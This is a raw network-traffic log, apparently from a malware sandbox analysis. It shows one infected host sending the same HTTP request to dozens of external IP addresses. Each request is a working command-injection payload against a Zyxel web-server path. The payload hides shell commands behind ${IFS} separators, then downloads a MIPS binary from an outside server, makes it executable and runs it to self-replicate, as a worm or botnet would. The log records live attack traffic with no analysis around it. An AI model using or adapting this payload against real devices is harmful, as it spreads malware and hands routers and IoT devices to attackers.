                                              Jan 29, 2024 07:04:09.384481907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9039192.168.2.145636653.133.224.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384541988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9040192.168.2.143463675.195.157.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384593010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9041192.168.2.14470044.239.170.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384609938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9042192.168.2.145787050.72.14.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384664059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9043192.168.2.14444088.119.205.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384694099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9044192.168.2.145014484.105.203.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384725094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9045192.168.2.1450528194.161.192.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384753942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9046192.168.2.144251280.178.27.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384783030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9047192.168.2.143727023.26.97.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384829998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9048192.168.2.1438198201.13.163.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384871960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9049192.168.2.143399075.167.249.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384907007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9050192.168.2.144657031.148.103.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384953976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9051192.168.2.14502029.20.21.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384989023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9052192.168.2.1453156147.2.10.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385045052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9053192.168.2.144033246.223.78.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385091066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9054192.168.2.1458960125.202.81.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385117054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9055192.168.2.144462287.43.150.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385138035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9056192.168.2.1435854189.180.212.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385174036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9057192.168.2.143565459.44.56.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385198116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9058192.168.2.1445896144.93.250.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385258913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9059192.168.2.1448860136.24.213.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385318995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9060192.168.2.1454884113.110.89.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385351896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9061192.168.2.143823881.148.1.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385382891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9062192.168.2.1438148124.46.75.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385417938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9063192.168.2.1443558173.69.5.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385469913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9064192.168.2.143566235.45.116.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385502100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9065192.168.2.1440912108.210.93.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385560036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9066192.168.2.1447866146.4.61.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385601997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9067192.168.2.143592837.9.81.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385643959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9068192.168.2.1433010156.123.148.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385679007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9069192.168.2.144648852.173.2.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385721922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9070192.168.2.1434956147.127.164.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385763884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9071192.168.2.143698460.210.110.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385792971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9072192.168.2.144458023.23.224.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385828018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9073192.168.2.143771260.131.136.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385874033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9074192.168.2.1450198105.153.238.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385938883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9075192.168.2.1434300198.129.241.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.385978937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9076192.168.2.145909881.110.160.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386092901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9077192.168.2.14564244.154.0.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386126995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9078192.168.2.145080846.158.60.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386152983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9079192.168.2.1449798114.94.243.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386205912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9080192.168.2.1435942206.139.253.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386245012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9081192.168.2.1436804172.10.101.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386279106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9082192.168.2.143355237.254.0.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386300087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9083192.168.2.1435616190.198.92.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386328936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9084192.168.2.145572060.157.30.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386363983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9085192.168.2.1459174204.45.243.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386431932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9086192.168.2.143895677.72.101.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386460066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9087192.168.2.1457496188.113.200.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386498928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9088192.168.2.144319673.107.77.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386518955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9089192.168.2.143490424.44.201.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386585951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9090192.168.2.143301469.208.169.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386617899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9091192.168.2.1445994143.27.105.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386661053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9092192.168.2.144432480.88.58.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386691093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9093192.168.2.1437994184.205.164.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386735916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9094192.168.2.1445842120.235.63.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386770010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9095192.168.2.144288697.255.47.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386826038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9096192.168.2.144294623.136.57.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386851072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9097192.168.2.1446350211.28.205.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386887074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9098192.168.2.143978473.142.242.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386934042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9099192.168.2.144156861.80.63.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.386986971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9100192.168.2.1439048208.202.86.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387015104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9101192.168.2.1436420126.139.111.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387064934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9102192.168.2.144892019.37.165.35443
                                              TimestampBytes transferredDirectionData
